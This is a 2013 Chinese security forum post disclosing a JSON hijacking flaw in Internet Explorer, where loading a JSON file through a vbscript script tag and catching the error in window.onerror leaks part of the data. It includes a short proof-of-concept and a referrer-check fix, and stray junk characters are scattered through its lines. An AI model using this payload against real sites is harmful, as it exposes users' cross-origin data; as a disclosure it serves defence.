找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2409|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
& [0 ?# Z/ i0 N# d0 l2 }
3 U$ T" f7 P9 V( g" D: W由于某些资源容器对数据处理不当导致json劫持漏洞.) X6 u, t+ \3 d  i
详细说明:
' ?* m" O) x: S6 _& T由于ie支持vbscript,所以script元素可以指定成vbscript语言:
" p" z: P3 b5 I7 |# c<script language=vbscript></script>: j. ^# Z1 m& z' c

2 H8 N0 X2 h' A/ P当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.5 p* P- Z  c% O! L( P
漏洞证明:! j6 t) t% B4 m8 p- r
<script>
  O  ~2 v4 {% x! J/ }* owindow.onerror=function(_){
. r7 T3 f0 O' ~# Halert(_)$ K) b1 x$ V- Y& {( _3 J& d! P
}2 m/ a1 u7 |: [3 D* x
</script>+ B  n0 J! Z6 J7 m$ Q. S$ g
<script language=vbscript src=1.json></script>
6 _9 [/ |7 t8 i/ Q6 M
( D' ?5 x  z) ^* ^( X) @/ {
# k/ P' Z# @8 m( _6 i4 t1.json:
% ~$ c# i" i* F  y5 J2 b  J[{"name":"sogili","age":19}]
9 x4 H/ {) Q. G' \/ g修复方案:/ _$ u$ `  v. d6 c1 R1 ]* m: l
网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表